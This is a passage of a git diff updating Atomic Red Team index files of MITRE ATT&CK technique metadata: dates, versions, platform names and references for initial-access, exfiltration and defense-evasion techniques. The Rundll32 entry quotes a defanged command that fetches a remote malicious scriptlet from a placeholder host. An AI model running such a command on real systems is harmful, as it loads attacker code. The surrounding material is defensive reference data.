+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -59557,7 +60460,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -59596,7 +60498,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -59611,7 +60513,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -59691,11 +60592,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -59751,11 +60651,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -59816,8 +60715,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
@@ -59845,13 +60744,12 @@ initial-access:
         url: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -59891,8 +60789,10 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -59900,13 +60800,13 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -59937,14 +60837,11 @@ initial-access:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1566.003:
     technique:
-      modified: '2024-01-31T14:15:55.690Z'
+      modified: '2024-10-15T15:16:30.272Z'
       name: Spearphishing via Service
       description: "Adversaries may send spearphishing messages via third-party services
         in an attempt to gain access to victim systems. Spearphishing via service
@@ -60011,11 +60908,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -60067,15 +60963,14 @@ initial-access:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
 exfiltration:
   T1567:
     technique:
-      modified: '2023-09-05T15:00:36.471Z'
+      modified: '2024-10-15T15:57:40.951Z'
       name: Exfiltration Over Web Service
       description: |-
         Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
@@ -60099,10 +60994,9 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
@@ -60121,13 +61015,12 @@ exfiltration:
         external_id: T1567
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.004:
     technique:
-      modified: '2023-10-12T05:22:59.079Z'
+      modified: '2024-10-15T15:57:55.928Z'
       name: Exfiltration Over Webhook
       description: "Adversaries may exfiltrate data to a webhook endpoint rather than
         over their primary command and control channel. Webhooks are simple mechanisms
@@ -60166,9 +61059,8 @@ exfiltration:
       - macOS
       - Linux
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
@@ -60218,7 +61110,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1029:
     technique:
@@ -60238,7 +61129,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1029
         external_id: T1029
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:26:48.769Z'
       name: Scheduled Transfer
       description: |-
         Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.
@@ -60258,8 +61149,6 @@ exfiltration:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1011:
     technique:
@@ -60306,7 +61195,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1011.001:
     technique:
@@ -60326,7 +61214,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1011.001
         url: https://attack.mitre.org/techniques/T1011/001
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:02:15.802Z'
       name: Exfiltration Over Bluetooth
       description: |-
         Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
@@ -60348,8 +61236,6 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020:
     technique:
@@ -60403,7 +61289,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1020
     atomic_tests: []
   T1048.001:
@@ -60428,7 +61313,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-28T00:43:24.228Z'
       name: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over a symmetrically
         encrypted network protocol other than that of the existing command and control
@@ -60463,12 +61348,10 @@ exfiltration:
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1020.001:
     technique:
-      modified: '2023-04-14T23:23:30.327Z'
+      modified: '2024-10-15T16:08:13.273Z'
       name: Traffic Duplication
       description: |-
         Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)
@@ -60493,11 +61376,10 @@ exfiltration:
       x_mitre_platforms:
       - Network
       - IaaS
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
       created: '2020-10-19T13:40:11.118Z'
@@ -60540,9 +61422,8 @@ exfiltration:
         url: https://www.us-cert.gov/ncas/alerts/TA18-106A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1567.001:
     technique:
@@ -60589,7 +61470,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1048.002:
     technique:
@@ -60615,7 +61495,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:44:11.953Z'
       name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric
         Encrypted Non-C2 Protocol
       description: "Adversaries may steal data by exfiltrating it over an asymmetrically
@@ -60648,13 +61528,11 @@ exfiltration:
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1048.002
     atomic_tests: []
   T1041:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-07T17:09:14.040Z'
       name: Exfiltration Over C2 Channel
       description: Adversaries may steal data by exfiltrating it over an existing
         command and control channel. Stolen data is encoded into the normal communications
@@ -60703,12 +61581,11 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1041
     atomic_tests: []
   T1048:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:57:26.415Z'
       name: Exfiltration Over Alternative Protocol
       description: "Adversaries may steal data by exfiltrating it over a different
         protocol than that of the existing command and control channel. The data may
@@ -60744,12 +61621,11 @@ exfiltration:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Network
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Access'
       - 'Network Traffic: Network Traffic Flow'
@@ -60758,7 +61634,6 @@ exfiltration:
       - 'Application Log: Application Log Content'
       - 'File: File Access'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_network_requirements: false
       type: attack-pattern
       id: attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776
       created: '2017-05-31T21:30:44.720Z'
@@ -60782,9 +61657,8 @@ exfiltration:
         url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048
     atomic_tests: []
   T1052.001:
@@ -60807,7 +61681,7 @@ exfiltration:
       - source_name: mitre-attack
         external_id: T1052.001
         url: https://attack.mitre.org/techniques/T1052/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.490Z'
       name: Exfiltration over USB
       description: Adversaries may attempt to exfiltrate data over a USB connected
         physical device. In certain circumstances, such as an air-gapped network compromise,
@@ -60829,8 +61703,6 @@ exfiltration:
       - 'Command: Command Execution'
       x_mitre_system_requirements:
       - Presence of physical medium or device
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1567.003:
     technique:
@@ -60881,7 +61753,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.003
     atomic_tests: []
   T1567.002:
@@ -60931,7 +61802,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1567.002
     atomic_tests: []
   T1030:
@@ -60956,7 +61826,7 @@ exfiltration:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:47:46.912Z'
       name: Data Transfer Size Limits
       description: An adversary may exfiltrate data in fixed size chunks instead of
         whole files or limit packet sizes below certain thresholds. This approach
@@ -60979,13 +61849,11 @@ exfiltration:
       - 'Network Traffic: Network Connection Creation'
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1030
     atomic_tests: []
   T1537:
     technique:
-      modified: '2024-04-11T15:53:00.577Z'
+      modified: '2024-10-15T16:08:25.344Z'
       name: Transfer Data to Cloud Account
       description: "Adversaries may exfiltrate data by transferring the data, including
         through sharing/syncing and creating backups of cloud environments, to another
@@ -61026,9 +61894,8 @@ exfiltration:
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Cloud Storage: Cloud Storage Modification'
       - 'Snapshot: Snapshot Creation'
@@ -61076,7 +61943,6 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1052:
     technique:
@@ -61098,7 +61964,7 @@ exfiltration:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1052
         external_id: T1052
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T22:48:29.702Z'
       name: Exfiltration Over Physical Medium
       description: Adversaries may attempt to exfiltrate data via a physical medium,
         such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61122,12 +61988,10 @@ exfiltration:
       x_mitre_system_requirements:
       - Presence of physical medium or device
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1048.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:39:25.476Z'
       name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
         Non-C2 Protocol'
       description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61191,6 +62055,5 @@ exfiltration:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1048.003
     atomic_tests: []
diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
index 75fa85ca80..921ed68f45 100644
--- a/atomics/Indexes/windows-index.yaml
+++ b/atomics/Indexes/windows-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,8 +97,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests:
     - name: Process Injection via Extra Window Memory (EWM) x64 executable
@@ -137,7 +135,7 @@ defense-evasion:
         elevation_required: false
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -200,21 +198,27 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-04T15:05:25.388Z'
       name: Fileless Storage
       description: "Adversaries may store data in \"fileless\" formats to conceal
         malicious activity from defenses. Fileless storage can be broadly defined
         as any format other than a file. Common examples of non-volatile fileless
-        storage include the Windows Registry, event logs, or WMI repository.(Citation:
-        Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
-        in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+        storage in Windows systems include the Windows Registry, event logs, or WMI
+        repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+        Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+        and `/var/lock` may also be considered fileless storage, as files written
+        to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+        Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+        2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+        behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
         and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
         data storage may remain undetected by anti-virus and other endpoint security
-        tools that can only access specific file formats from disk storage.\n\nAdversaries
+        tools that can only access specific file formats from disk storage. Leveraging
+        fileless storage may also allow adversaries to bypass the protections offered
+        by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
         may use fileless storage to conceal various types of stored data, including
         payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
         and collected data not yet exfiltrated from the victim (e.g., [Local Data
@@ -234,6 +238,7 @@ defense-evasion:
       - Mark Wee
       - Simona David
       - Xavier Rousseau
+      - Vito Alfano, Group-IB
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -241,10 +246,12 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.0'
+      - Linux
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'WMI: WMI Creation'
+      - 'Process: Process Creation'
       type: attack-pattern
       id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
       created: '2023-03-23T19:55:25.546Z'
@@ -254,6 +261,14 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1027/011
         external_id: T1027.011
+      - source_name: Aquasec Muhstik Malware 2024
+        description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+          Queuing Services Applications. Retrieved September 24, 2024."
+        url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+      - source_name: Elastic Binary Executed from Shared Memory Directory
+        description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+          Retrieved September 24, 2024.
+        url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
       - source_name: SecureList Fileless
         description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
           Retrieved March 23, 2023.
@@ -262,15 +277,22 @@ defense-evasion:
         description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
           23, 2023.
         url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+      - source_name: Sysdig Fileless Malware 23022
+        description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+          September 24, 2024.
+        url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+      - source_name: Akami Frog4Shell 2024
+        description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+          Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+        url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.011:
     technique:
-      modified: '2023-08-14T15:35:28.965Z'
+      modified: '2024-10-14T13:14:43.083Z'
       name: 'Signed Binary Proxy Execution: Rundll32'
       description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
         code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -281,10 +303,10 @@ defense-evasion:
         also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
         Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code>
         and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes
-        rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
-        be used to execute scripts such as JavaScript. This can be done using a syntax
-        similar to this: <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
-        \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
+        rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+        can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+        scripts such as JavaScript. This can be done using a syntax similar to this:
+        <code>rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"</code>
         \ This behavior has been seen used by malware such as Poweliks. (Citation:
         This is Security Command Line Confusion)\n\nAdversaries may also attempt to
         obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -320,7 +342,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -350,7 +372,7 @@ defense-evasion:
       - source_name: This is Security Command Line Confusion
         description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
           Retrieved March 5, 2018.
-        url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+        url: https://www.stormshield.com/news/poweliks-command-line-confusion/
       - source_name: Github NoRunDll
         description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
           2021.
@@ -361,9 +383,8 @@ defense-evasion:
         url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.011
     atomic_tests:
     - name: Rundll32 execute JavaScript Remote Payload With GetObject
@@ -840,49 +861,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
